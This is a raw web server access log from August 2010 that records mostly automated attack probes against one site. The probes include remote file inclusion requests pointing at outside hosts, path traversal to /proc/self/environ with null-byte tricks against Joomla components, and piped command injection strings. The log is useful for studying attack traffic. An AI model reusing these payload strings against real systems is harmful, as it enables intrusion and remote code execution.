89.200.143.74 - - [22/Aug/2010:14:30:05 -0400] "GET /log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://iyunk.fileave.com/id1.txt??? HTTP/1.1" 404 339
92.43.201.28 - - [22/Aug/2010:14:30:05 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 376
92.43.201.28 - - [22/Aug/2010:14:30:05 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 376
89.200.143.74 - - [22/Aug/2010:14:30:06 -0400] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://iyunk.fileave.com/id1.txt??? HTTP/1.1" 404 335
89.200.143.74 - - [22/Aug/2010:14:30:07 -0400] "GET /log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://iyunk.fileave.com/id1.txt??? HTTP/1.1" 404 339
89.200.143.74 - - [22/Aug/2010:14:30:07 -0400] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://iyunk.fileave.com/id1.txt??? HTTP/1.1" 404 335
89.200.143.74 - - [22/Aug/2010:14:30:20 -0400] "GET /log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://iyunk.fileave.com/id1.txt??? HTTP/1.1" 404 339
89.200.143.74 - - [22/Aug/2010:14:30:20 -0400] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://iyunk.fileave.com/id1.txt??? HTTP/1.1" 404 335
89.25.247.82 - - [22/Aug/2010:14:31:07 -0400] "GET /log/mantis/login_page.php?g_meta_include_file=http://ilbok.com/redzone/id1???? HTTP/1.1" 404 306
89.25.247.82 - - [22/Aug/2010:14:31:07 -0400] "GET /mantis/login_page.php?g_meta_include_file=http://ilbok.com/redzone/id1???? HTTP/1.1" 404 302
89.25.247.82 - - [22/Aug/2010:14:31:07 -0400] "GET /log/sdaglobal.org-access_log.3%20%20/mantis/login_page.php?g_meta_include_file=http://ilbok.com/redzone/id1???? HTTP/1.1" 404 335
78.129.182.82 - - [22/Aug/2010:14:31:59 -0400] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290
85.19.150.100 - - [22/Aug/2010:14:32:48 -0400] "POST /log/sdaglobal.org-access_log%20%20//contact.php HTTP/1.1" 404 324
85.19.150.100 - - [22/Aug/2010:14:32:48 -0400] "POST /log//contact.php HTTP/1.1" 404 297
85.19.150.100 - - [22/Aug/2010:14:32:48 -0400] "POST //contact.php HTTP/1.1" 404 293
85.19.150.100 - - [22/Aug/2010:14:32:48 -0400] "POST /log/sdaglobal.org-access_log%20%20//contact.php HTTP/1.1" 404 324
85.19.150.100 - - [22/Aug/2010:14:32:48 -0400] "POST /log//contact.php HTTP/1.1" 404 297
85.19.150.100 - - [22/Aug/2010:14:32:49 -0400] "POST /log/sdaglobal.org-access_log%20%20//contact.php HTTP/1.1" 404 324
85.19.150.100 - - [22/Aug/2010:14:32:49 -0400] "POST /log//contact.php HTTP/1.1" 404 297
85.19.150.100 - - [22/Aug/2010:14:32:49 -0400] "POST //contact.php HTTP/1.1" 404 293
85.19.150.100 - - [22/Aug/2010:14:32:49 -0400] "POST /log/sdaglobal.org-access_log%20%20//contact.php HTTP/1.1" 404 324
85.19.150.100 - - [22/Aug/2010:14:32:49 -0400] "POST /log//contact.php HTTP/1.1" 404 297
85.19.150.100 - - [22/Aug/2010:14:32:49 -0400] "POST //contact.php HTTP/1.1" 404 293
85.19.150.100 - - [22/Aug/2010:14:32:50 -0400] "POST //contact.php HTTP/1.1" 404 293
85.19.150.100 - - [22/Aug/2010:14:33:10 -0400] "POST /log//contact.php HTTP/1.1" 404 297
85.19.150.100 - - [22/Aug/2010:14:33:10 -0400] "POST /log/sdaglobal.org-access_log//contact.php HTTP/1.1" 404 322
85.19.150.100 - - [22/Aug/2010:14:33:11 -0400] "POST /log//contact.php HTTP/1.1" 404 297
85.19.150.100 - - [22/Aug/2010:14:33:11 -0400] "POST /log/sdaglobal.org-access_log//contact.php HTTP/1.1" 404 322
85.19.150.100 - - [22/Aug/2010:14:33:11 -0400] "POST /log//contact.php HTTP/1.1" 404 297
85.19.150.100 - - [22/Aug/2010:14:33:12 -0400] "POST /log//contact.php HTTP/1.1" 404 297
85.19.150.100 - - [22/Aug/2010:14:33:13 -0400] "POST //contact.php HTTP/1.1" 404 293
85.19.150.100 - - [22/Aug/2010:14:33:14 -0400] "POST //contact.php HTTP/1.1" 404 293
85.19.150.100 - - [22/Aug/2010:14:33:17 -0400] "POST //contact.php HTTP/1.1" 404 293
85.19.150.100 - - [22/Aug/2010:14:33:18 -0400] "POST //contact.php HTTP/1.1" 404 293
85.19.150.100 - - [22/Aug/2010:14:33:20 -0400] "POST /log/sdaglobal.org-access_log//contact.php HTTP/1.1" 404 322
85.19.150.100 - - [22/Aug/2010:14:33:21 -0400] "POST /log/sdaglobal.org-access_log//contact.php HTTP/1.1" 404 322
89.25.247.82 - - [22/Aug/2010:14:34:37 -0400] "GET /log/mantis/login_page.php?g_meta_include_file=http://ilbok.com/redzone/id1???? HTTP/1.1" 404 306
89.25.247.82 - - [22/Aug/2010:14:34:37 -0400] "GET /log/sdaglobal.org-access_log.3%20%20/mantis/login_page.php?g_meta_include_file=http://ilbok.com/redzone/id1???? HTTP/1.1" 404 335
89.25.247.82 - - [22/Aug/2010:14:34:42 -0400] "GET /mantis/login_page.php?g_meta_include_file=http://ilbok.com/redzone/id1???? HTTP/1.1" 404 302
216.97.239.105 - - [22/Aug/2010:14:35:05 -0400] "GET /log//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 61824
216.97.239.105 - - [22/Aug/2010:14:35:06 -0400] "GET /log//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 61824
216.97.239.105 - - [22/Aug/2010:14:35:07 -0400] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9426
216.97.239.105 - - [22/Aug/2010:14:35:07 -0400] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9426
74.98.64.114 - - [22/Aug/2010:14:36:23 -0400] "POST /log//contact.php HTTP/1.1" 404 297
74.98.64.114 - - [22/Aug/2010:14:36:23 -0400] "POST /log/sdaglobal.org-access_log.1%20%20//contact.php HTTP/1.1" 404 326
74.98.64.114 - - [22/Aug/2010:14:36:23 -0400] "POST //contact.php HTTP/1.1" 404 293
78.129.182.82 - - [22/Aug/2010:14:36:54 -0400] "GET /log/sdaglobal.org-access_log.1/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321
78.129.182.82 - - [22/Aug/2010:14:36:56 -0400] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290
78.129.182.82 - - [22/Aug/2010:14:36:57 -0400] "GET /log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294
78.129.182.82 - - [22/Aug/2010:14:37:00 -0400] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290
92.43.201.28 - - [22/Aug/2010:14:37:29 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 376
92.43.201.28 - - [22/Aug/2010:14:37:29 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 376
92.43.201.28 - - [22/Aug/2010:14:37:29 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 347
92.43.201.28 - - [22/Aug/2010:14:37:30 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 343
92.43.201.28 - - [22/Aug/2010:14:37:30 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 347
92.43.201.28 - - [22/Aug/2010:14:37:30 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 343
207.46.12.236 - - [22/Aug/2010:14:37:44 -0400] "GET /log/auccf.sdaglobal.org-access_log.3 HTTP/1.1" 200 14961
188.127.248.175 - - [22/Aug/2010:14:40:06 -0400] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9426
188.127.248.175 - - [22/Aug/2010:14:40:07 -0400] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9426
92.62.196.66 - - [22/Aug/2010:14:41:16 -0400] "POST //contact.php HTTP/1.1" 404 293
92.62.196.66 - - [22/Aug/2010:14:41:17 -0400] "POST /log//contact.php HTTP/1.1" 404 297
92.62.196.66 - - [22/Aug/2010:14:41:17 -0400] "POST /log/sdaglobal.org-access_log.4//contact.php HTTP/1.1" 404 324
212.154.246.147 - - [22/Aug/2010:14:41:18 -0400] "GET /log//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 61824
212.154.246.147 - - [22/Aug/2010:14:41:17 -0400] "GET /log//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 61824
212.154.246.147 - - [22/Aug/2010:14:41:22 -0400] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9426
212.154.246.147 - - [22/Aug/2010:14:41:24 -0400] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9426
78.129.182.82 - - [22/Aug/2010:14:42:05 -0400] "GET /log/sdaglobal.org-access_log.2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321
92.43.201.28 - - [22/Aug/2010:14:45:08 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 376
92.43.201.28 - - [22/Aug/2010:14:45:09 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 376
85.19.150.100 - - [22/Aug/2010:14:48:38 -0400] "POST //contact.php HTTP/1.1" 404 293
85.19.150.100 - - [22/Aug/2010:14:48:38 -0400] "POST /log/sdaglobal.org-access_log.1//contact.php HTTP/1.1" 404 324
85.19.150.100 - - [22/Aug/2010:14:48:39 -0400] "POST //contact.php HTTP/1.1" 404 293
85.19.150.100 - - [22/Aug/2010:14:48:39 -0400] "POST /log/sdaglobal.org-access_log.1//contact.php HTTP/1.1" 404 324
85.19.150.100 - - [22/Aug/2010:14:48:39 -0400] "POST //contact.php HTTP/1.1" 404 293
85.19.150.100 - - [22/Aug/2010:14:48:39 -0400] "POST /log/sdaglobal.org-access_log.1//contact.php HTTP/1.1" 404 324
85.19.150.100 - - [22/Aug/2010:14:48:39 -0400] "POST //contact.php HTTP/1.1" 404 293
85.19.150.100 - - [22/Aug/2010:14:48:39 -0400] "POST /log/sdaglobal.org-access_log.1//contact.php HTTP/1.1" 404 324
85.19.150.100 - - [22/Aug/2010:14:48:40 -0400] "POST /log//contact.php HTTP/1.1" 404 297
85.19.150.100 - - [22/Aug/2010:14:48:40 -0400] "POST /log//contact.php HTTP/1.1" 404 297
85.19.150.100 - - [22/Aug/2010:14:48:41 -0400] "POST /log//contact.php HTTP/1.1" 404 297
85.19.150.100 - - [22/Aug/2010:14:48:44 -0400] "POST /log//contact.php HTTP/1.1" 404 297
188.127.248.175 - - [22/Aug/2010:14:49:07 -0400] "GET /log/sdaglobal.org-access_log.3//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313
188.127.248.175 - - [22/Aug/2010:14:49:07 -0400] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9426
188.127.248.175 - - [22/Aug/2010:14:49:08 -0400] "GET /log/sdaglobal.org-access_log.3//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313
188.127.248.175 - - [22/Aug/2010:14:49:08 -0400] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9426
188.127.248.175 - - [22/Aug/2010:14:49:08 -0400] "GET /log//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 61824
188.127.248.175 - - [22/Aug/2010:14:49:09 -0400] "GET /log//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 61824
78.129.182.82 - - [22/Aug/2010:14:51:09 -0400] "GET /log/sdaglobal.org-access_log.1/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321
78.129.182.82 - - [22/Aug/2010:14:51:10 -0400] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290
78.129.182.82 - - [22/Aug/2010:14:51:10 -0400] "GET /log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294
78.129.182.82 - - [22/Aug/2010:14:51:31 -0400] "GET /log/sdaglobal.org-access_log.2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321
67.195.111.232 - - [22/Aug/2010:14:51:58 -0400] "GET /log/?N=A HTTP/1.0" 200 61820
92.43.201.28 - - [22/Aug/2010:14:52:08 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 343
92.43.201.28 - - [22/Aug/2010:14:52:08 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 343
92.43.201.28 - - [22/Aug/2010:14:52:08 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 347
92.43.201.28 - - [22/Aug/2010:14:52:09 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 347
92.43.201.28 - - [22/Aug/2010:14:52:12 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 376
92.43.201.28 - - [22/Aug/2010:14:52:12 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 376
78.129.182.82 - - [22/Aug/2010:14:53:07 -0400] "GET /log/sdaglobal.org-access_log.1/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321
78.129.182.82 - - [22/Aug/2010:14:53:08 -0400] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290
78.129.182.82 - - [22/Aug/2010:14:53:08 -0400] "GET /log/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294
78.129.182.82 - - [22/Aug/2010:14:53:08 -0400] "GET /log/sdaglobal.org-access_log/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319
84.21.8.208 - - [22/Aug/2010:14:54:28 -0400] "POST //contact.php HTTP/1.1" 404 293
84.21.8.208 - - [22/Aug/2010:14:54:28 -0400] "POST /log//contact.php HTTP/1.1" 404 297
84.21.8.208 - - [22/Aug/2010:14:54:28 -0400] "POST /log/sdaglobal.org-access_log%20%20//contact.php HTTP/1.1" 404 324
71.191.36.190 - - [22/Aug/2010:14:54:29 -0400] "GET /images/china.gif HTTP/1.1" 200 3479
71.191.36.190 - - [22/Aug/2010:14:54:29 -0400] "GET /images/chinese.gif HTTP/1.1" 200 3578
84.21.8.208 - - [22/Aug/2010:14:55:03 -0400] "POST //contact.php HTTP/1.1" 404 293
84.21.8.208 - - [22/Aug/2010:14:55:03 -0400] "POST /log//contact.php HTTP/1.1" 404 297
84.21.8.208 - - [22/Aug/2010:14:55:03 -0400] "POST /log/sdaglobal.org-access_log.1//contact.php HTTP/1.1" 404 324
85.19.150.100 - - [22/Aug/2010:14:55:25 -0400] "POST /log//contact.php HTTP/1.1" 404 297
85.19.150.100 - - [22/Aug/2010:14:55:25 -0400] "POST /log/sdaglobal.org-access_log%20%20//contact.php HTTP/1.1" 404 324
85.19.150.100 - - [22/Aug/2010:14:55:25 -0400] "POST /log//contact.php HTTP/1.1" 404 297
85.19.150.100 - - [22/Aug/2010:14:55:25 -0400] "POST /log/sdaglobal.org-access_log%20%20//contact.php HTTP/1.1" 404 324
85.19.150.100 - - [22/Aug/2010:14:55:26 -0400] "POST /log//contact.php HTTP/1.1" 404 297
85.19.150.100 - - [22/Aug/2010:14:55:26 -0400] "POST /log/sdaglobal.org-access_log%20%20//contact.php HTTP/1.1" 404 324
85.19.150.100 - - [22/Aug/2010:14:55:26 -0400] "POST /log/sdaglobal.org-access_log%20%20//contact.php HTTP/1.1" 404 324
85.19.150.100 - - [22/Aug/2010:14:55:27 -0400] "POST /log//contact.php HTTP/1.1" 404 297
85.19.150.100 - - [22/Aug/2010:14:55:28 -0400] "POST //contact.php HTTP/1.1" 404 293
85.19.150.100 - - [22/Aug/2010:14:55:37 -0400] "POST //contact.php HTTP/1.1" 404 293
85.19.150.100 - - [22/Aug/2010:14:55:37 -0400] "POST //contact.php HTTP/1.1" 404 293
85.19.150.100 - - [22/Aug/2010:14:55:38 -0400] "POST //contact.php HTTP/1.1" 404 293
85.19.150.100 - - [22/Aug/2010:14:55:52 -0400] "POST //contact.php HTTP/1.1" 404 293
85.19.150.100 - - [22/Aug/2010:14:55:52 -0400] "POST /log/sdaglobal.org-access_log//contact.php HTTP/1.1" 404 322
85.19.150.100 - - [22/Aug/2010:14:55:52 -0400] "POST //contact.php HTTP/1.1" 404 293
85.19.150.100 - - [22/Aug/2010:14:55:53 -0400] "POST //contact.php HTTP/1.1" 404 293
85.19.150.100 - - [22/Aug/2010:14:55:53 -0400] "POST /log/sdaglobal.org-access_log//contact.php HTTP/1.1" 404 322
85.19.150.100 - - [22/Aug/2010:14:55:53 -0400] "POST //contact.php HTTP/1.1" 404 293
85.19.150.100 - - [22/Aug/2010:14:55:54 -0400] "POST /log/sdaglobal.org-access_log//contact.php HTTP/1.1" 404 322
85.19.150.100 - - [22/Aug/2010:14:55:55 -0400] "POST /log/sdaglobal.org-access_log//contact.php HTTP/1.1" 404 322
85.19.150.100 - - [22/Aug/2010:14:55:55 -0400] "POST /log//contact.php HTTP/1.1" 404 297
85.19.150.100 - - [22/Aug/2010:14:55:56 -0400] "POST /log//contact.php HTTP/1.1" 404 297
85.19.150.100 - - [22/Aug/2010:14:55:57 -0400] "POST /log//contact.php HTTP/1.1" 404 297
85.19.150.100 - - [22/Aug/2010:14:56:00 -0400] "POST /log//contact.php HTTP/1.1" 404 297
71.191.36.190 - - [22/Aug/2010:14:56:09 -0400] "GET /images/chinese.gif HTTP/1.1" 304 -
71.191.36.190 - - [22/Aug/2010:14:56:09 -0400] "GET /images/china.gif HTTP/1.1" 304 -
91.103.220.165 - - [22/Aug/2010:14:56:26 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_sectionex&controller=http://galepo.webs.com/Ckrid1.txt?? HTTP/1.1" 404 320
91.103.220.165 - - [22/Aug/2010:14:56:26 -0400] "GET /log//index.php?option=com_sectionex&controller=http://galepo.webs.com/Ckrid1.txt?? HTTP/1.1" 404 295
91.103.220.165 - - [22/Aug/2010:14:56:26 -0400] "GET //index.php?option=com_sectionex&controller=http://galepo.webs.com/Ckrid1.txt?? HTTP/1.1" 404 291
91.103.220.165 - - [22/Aug/2010:14:56:26 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_sectionex&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 320
91.103.220.165 - - [22/Aug/2010:14:56:26 -0400] "GET /log//index.php?option=com_sectionex&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 295
91.103.220.165 - - [22/Aug/2010:14:56:26 -0400] "GET //index.php?option=com_sectionex&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 291
84.21.8.208 - - [22/Aug/2010:14:59:24 -0400] "POST //contact.php HTTP/1.1" 404 293
84.21.8.208 - - [22/Aug/2010:14:59:24 -0400] "POST /log/sdaglobal.org-access_log%20%20//contact.php HTTP/1.1" 404 324
84.21.8.208 - - [22/Aug/2010:14:59:25 -0400] "POST /log//contact.php HTTP/1.1" 404 297
84.21.8.208 - - [22/Aug/2010:14:59:30 -0400] "POST //contact.php HTTP/1.1" 404 293
84.21.8.208 - - [22/Aug/2010:14:59:30 -0400] "POST /log//contact.php HTTP/1.1" 404 297
84.21.8.208 - - [22/Aug/2010:14:59:30 -0400] "POST /log/sdaglobal.org-access_log//contact.php HTTP/1.1" 404 322
74.55.250.50 - - [22/Aug/2010:15:00:12 -0400] "GET /log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 295
74.55.250.50 - - [22/Aug/2010:15:00:12 -0400] "GET /log/sdaglobal.org-access_log.2//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 322
74.55.250.50 - - [22/Aug/2010:15:00:12 -0400] "GET //index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 291
74.55.250.50 - - [22/Aug/2010:15:00:12 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 320
74.55.250.50 - - [22/Aug/2010:15:00:13 -0400] "GET /log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 295
74.55.250.50 - - [22/Aug/2010:15:00:13 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 320
74.55.250.50 - - [22/Aug/2010:15:00:14 -0400] "GET //index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 291
74.55.250.50 - - [22/Aug/2010:15:00:14 -0400] "GET /log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 295
74.55.250.50 - - [22/Aug/2010:15:00:14 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 320
74.55.250.50 - - [22/Aug/2010:15:00:14 -0400] "GET /log/sdaglobal.org-access_log.2//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 322
74.55.250.50 - - [22/Aug/2010:15:00:15 -0400] "GET /log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
74.55.250.50 - - [22/Aug/2010:15:00:15 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320
74.55.250.50 - - [22/Aug/2010:15:00:15 -0400] "GET /log/sdaglobal.org-access_log.2//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 322
74.55.250.50 - - [22/Aug/2010:15:00:16 -0400] "GET //index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 291
